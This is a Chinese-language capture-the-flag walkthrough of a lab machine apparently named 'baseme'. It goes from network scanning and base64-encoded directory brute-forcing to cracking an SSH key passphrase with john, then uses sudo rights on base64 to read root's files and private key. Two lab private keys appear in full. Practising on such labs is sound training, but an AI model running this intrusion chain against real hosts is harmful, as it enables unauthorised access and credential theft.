信息搜集 arp-scan -l
1 2 3 4 5 6 7 8 9 10 11 ┌──(root㉿kali)-[~/Desktop/tmp] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.31.1 a4:a9:30:df:ef:44 (Unknown) 192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered) 192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered) 192.168.31.232 08:00:27:d9:d3:0c PCS Systemtechnik GmbH 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.973 seconds (129.75 hosts/sec). 4 responded
ip为192.168.31.220,nmap扫描端口
1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.232 --min-rate=1000 -p- Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 08:13 EST Nmap scan report for baseme (192.168.31.232) Host is up (0.0065s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:D9:D3:0C (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 21.46 seconds
80端口 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root㉿kali)-[~/Desktop/tmp] └─# curl 192.168.31.232 QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK <!-- iloveyou youloveyou shelovesyou helovesyou weloveyou theyhatesme -->
给了一串base64和几个字符串
base64解码内容为:
1 2 3 4 5 6 ┌──(root㉿kali)-[~/Desktop/tmp] └─# echo "QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK"|base64 -d ALL, absolutely ALL that you need is in BASE64. Including the password that you need :) Remember, BASE64 has the answer to all your questions. -lucas
可以知道用户名为lucas,并且所有内容都要进行base64。
将字典进行base64编码,然后扫描目录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌──(root㉿kali)-[~/Desktop/tmp] └─# cat /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt|while read line;do for i in $line;echo $i|base64 >>1;done ┌──(root㉿kali)-[~/Desktop/tmp] └─# gobuster dir -u "http://192.168.31.232" -w ./1 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.31.232 [+] Method: GET [+] Threads: 10 [+] Wordlist: ./1 [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /aWRfcnNhCg== (Status: 200) [Size: 2537] /cm9ib3RzLnR4dAo= (Status: 200) [Size: 25] Progress: 4736 / 4737 (99.98%) =============================================================== Finished ===============================================================
这两个文件分别是id_rsa和robots.txt
1 2 3 4 5 6 7 ┌──(root㉿kali)-[~/Desktop/tmp] └─# echo "aWRfcnNhCg=="|base64 -d id_rsa ┌──(root㉿kali)-[~/Desktop/tmp] └─# echo "cm9ib3RzLnR4dAo="|base64 -d robots.txt
robots.txt里什么也没有
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ┌──(root㉿kali)-[~/Desktop/tmp] └─# base64 cm9ib3RzLnR4dAo= -d Nothing here :( ┌──(root㉿kali)-[~/Desktop/tmp] └─# base64 aWRfcnNhCg=\= -d -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBTxe8YUL BtzfftAdPgp8YZAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCZCXvEPnO1 cbhxqctBEcBDZjqrFfolwVKmpBgY07M3CK7pO10UgBsLyYwAzJEw4e6YgPNSyCDWFaNTKG 07jgcgrggre8ePCMNFBCAGaYHmLrFIsKDCLI4NE54t58IUHeXCZz72xTobL/ptLk26RBnh 7bHG1JjGlxOkO6m+1oFNLtNuD2QPl8sbZtEzX4S9nNZ/dpyRpMfmB73rN3yyIylevVDEyv f7CZ7oRO46uDgFPy5VzkndCeJF2YtZBXf5gjc2fajMXvq+b8ol8RZZ6jHXAhiblBXwpAm4 vLYfxzI27BZFnoteBnbdzwSL5apBF5gYWJAHKj/J6MhDj1GKAFc1AAAD0N9UDTcUxwMt5X YFIZK8ieBL0NOuwocdgbUuktC21SdnSy6ocW3imM+3mzWjPdoBK/Ho339uPmBWI5sbMrpK xkZMnl+rcTbgz4swv8gNuKhUc7wTgtrNX+PNMdIALNpsxYLt/l56GK8R4J8fLIU5+MojRs +1NrYs8J4rnO1qWNoJRZoDlAaYqBV95cXoAEkwUHVustfgxUtrYKp+YPFIgx8okMjJgnbi NNW3TzxluNi5oUhalH2DJ2khKDGQUi9ROFcsEXeJXt3lgpZZt1hrQDA1o8jTXeS4+dW7nZ zjf3p0M77b/NvcZE+oXYQ1g5Xp1QSOSbj+tlmw54L7Eqb1UhZgnQ7ZsKCoaY9SuAcqm3E0 IJh+I+Zv1egSMS/DOHIxO3psQkciLjkpa+GtwQMl1ZAJHQaB6q70JJcBCfVsykdY52LKDI pxZYpLZmyDx8TTaA8JOmvGpfNZkMU4I0i5/ZT65SRFJ1NlBCNwcwtOl9k4PW5LVxNsGRCJ MJr8k5Ac0CX03fXESpmsUUVS+/Dj/hntHw89dO8HcqqIUEpeEbfTWLvax0CiSh3KjSceJp +8gUyDGvCkcyVneUQjmmrRswRhTNxxKRBZsekGwHpo8hDYbUEFZqzzLAQbBIAdrl1tt7mV tVBrmpM6CwJdzYEl21FaK8jvdyCwPr5HUgtuxrSpLvndcnwPaxJWGi4P471DDZeRYDGcWh i6bICrLQgeJlHaEUmrQC5Rdv03zwI9U8DXUZ/OHb40PL8MXqBtU/b6CEU9JuzJpBrKZ+k+ tSn7hr8hppT2tUSxDvC+USMmw/WDfakjfHpoNwh7Pt5i0cwwpkXFQxJPvR0bLxvXZn+3xw N7bw45FhBZCsHCAbV2+hVsP0lyxCQOj7yGkBja87S1e0q6WZjjB4SprenHkO7tg5Q0HsuM Aif/02HHzWG+CR/IGlFsNtq1vylt2x+Y/091vCkROBDawjHz/8ogy2Fzg8JYTeoLkHwDGQ O+TowA10RATek6ZEIxh6SmtDG/V5zeWCuEmK4sRT3q1FSvpB1/H+FxsGCoPIg8FzciGCh2 TLuskcXiagns9N1RLOnlHhiZd8RZA0Zg7oZIaBvaZnhZYGycpAJpWKebjrtokLYuMfXRLl 3/SAeUl72EA3m1DInxsPguFuk00roMc77N6erY7tjOZLVYPoSiygDR1A7f3zYz+0iFI4rL ND8ikgmQvF6hrwwJBrp/0xKEaMTCKLvyyZ3eDSdBDPrkThhFwrPpI6+Ex8RvcWI6bTJAWJ LdmmRXUS/DtO+69/aidvxGAYob+1M= -----END OPENSSH PRIVATE KEY-----
80端口给了几个字符串就是字典,base64编码后爆破id_rsa的密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(root㉿kali)-[~/Desktop/tmp] └─# cat 1|while read line;do for i in $line;echo $i|base64 >>1;done ┌──(root㉿kali)-[~/Desktop/tmp] └─# cat 1 iloveyou youloveyou shelovesyou helovesyou weloveyou theyhatesme aWxvdmV5b3UK eW91bG92ZXlvdQo= c2hlbG92ZXN5b3UK aGVsb3Zlc3lvdQo= d2Vsb3ZleW91Cg== dGhleWhhdGVzbWUK
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ┌──(root㉿kali)-[~/Desktop/tmp] └─# ssh2john id_rsa>1 ┌──(root㉿kali)-[~/Desktop/tmp] └─# john 1 -w=1 Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) No password hashes left to crack (see FAQ) ┌──(root㉿kali)-[~/Desktop/tmp] └─# john 1 -w=1 --show Invalid options combination: "--show" ┌──(root㉿kali)-[~/Desktop/tmp] └─# john 1 --show id_rsa:aWxvdmV5b3UK 1 password hash cracked, 0 left
lucas用户的密码就是aWxvdmV5b3UK
提权 ssh登录拿到user.txt
sudo -l可以无密码运行base64,直接读取/root/root.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 lucas@MiWiFi-RA71-srv:~$ sudo -u root base64 /root/root.txt|base64 -d sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname . ** * *. ,* *, , ,* ., *, / * ,* *, /. .*. * ** ,* ,* ** *. ** **. ,* ** *, ,* * ** *, .* *. ** ** ,*, ** *, HMVFKBS64
想提权到root的话需要读取id_rsa
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 lucas@MiWiFi-RA71-srv:~$ sudo -u root base64 /root/.ssh/id_rsa|base64 -d sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEAw6MgMnxUy+W9oem0Uhr2cJiez37qVubRK9D4kdu7H5NQ/Z0FFp2B IdV3wx9xDWAICJgtYQUvOV7KFNAWvEXTDdhBwdiUcWEJ4AOXK7+5v7x4b8vuG5zK0lTVxp DEBE8faPj3UaHsa1JUVaDngTIkCa6VBICvG0DCcfL8xHBpCSIfoHfpqmOpWT/pWXvGI3tk /Ku/STY7Ay8HtSgoqCcf3F+lb9J9kwKhFg9eLO5QDuFujb1CN7gUy8xhgNanUViyCZRwn7 px+DfU+nscSEfG1zgfgqn2hCbBYqaP0jBgWcVL6YoMiwCS3jhmeFG4C/p51j3gI6b8yz9a S+DtdTpDwQAAA8D82/wZ/Nv8GQAAAAdzc2gtcnNhAAABAQDDoyAyfFTL5b2h6bRSGvZwmJ 7PfupW5tEr0PiR27sfk1D9nQUWnYEh1XfDH3ENYAgImC1hBS85XsoU0Ba8RdMN2EHB2JRx YQngA5crv7m/vHhvy+4bnMrSVNXGkMQETx9o+PdRoexrUlRVoOeBMiQJrpUEgK8bQMJx8v zEcGkJIh+gd+mqY6lZP+lZe8Yje2T8q79JNjsDLwe1KCioJx/cX6Vv0n2TAqEWD14s7lAO 4W6NvUI3uBTLzGGA1qdRWLIJlHCfunH4N9T6exxIR8bXOB+CqfaEJsFipo/SMGBZxUvpig yLAJLeOGZ4UbgL+nnWPeAjpvzLP1pL4O11OkPBAAAAAwEAAQAAAQBIArRoQOGJh9AMWBS6 oBgUC+lw4Ptq710Q7sOAFMxE7BnEsFZeI62TgZqqpNkdHjr2xuT1ME5YpK5niMzFkkIEd5 SEwK6rKRfUcB3lyZWaoMoIBJ1pZoY1c2qYw1KTb3hVUEbgsmRugIhwWGC+anFfavaJCMDr nCO2g8VMnT/cTyAv/Qmi8m868KNEzcuzGV5ozHl1XLffHM9R/cqPPyAYaQIa9Z+kS6ou9R iMTjTSxOPnfh286kgx0ry1se9BBlrEc5251R/PRkEKYrMj3AIwI30qvYlAtNfcCFhoJXLq vWystPARwiUs7WYBUHRf6bPP/pHTTvwwb2bs51ngImpdAAAAgDaWnQ7Lj7Vp+mTjhSu4oG ptDHNd2uuqB1+CHRcaVutUmknxvxG3p957UbvNp6e0+ePKtAIakrzbpAo6u25poyWugAuz X2nQhqsQh6yrThDJlTiDMeV7JNGFbGOcanXXXHt3tjfyrS0+aM87WmwqNyh6nfgy1C5axR fKZG8ivz5iAAAAgQD83QmCIcbZaCOlGwgHGcuCUDcxGY1QlIRnbM5VAjimNezGFs9f0ExD SiTwFsmITP//njsbRZP2laiKKO6j4yp5LpfgDB5QHs+g4nXvDn6ns64gCKo7tf2bPP8VCe FWyc2JyqREwE3WmyhkPlyr9xAZerZ+7Fz+NFueRYzDklWg8wAAAIEAxhBeLqbo6/GUKXF5 rFRatLXI43Jrd9pyvLx62KghsnEBEk7my9sbU5dvYBLztS+lfPCRxV2ZzpjYdN4SDJbXIR txBaLJe3c4uIc9WjyxGwUK9IL65rSrRVERHsTO525ofPWGQEa2A+pRCpz3A4Y41fy8Y9an 2B2NmfTAfEkWFXsAAAALcm9vdEBiYXNlbWU= -----END OPENSSH PRIVATE KEY-----
1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root㉿kali)-[~/Desktop/tmp] └─# ssh root@192.168.31.232 -i id_rsa Linux MiWiFi-RA71-srv 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Jan 22 08:08:11 2025 from 192.168.31.129 root@MiWiFi-RA71-srv:~#
总结 在处理字典的时候还可以有更高效的方法,其他的就没啥了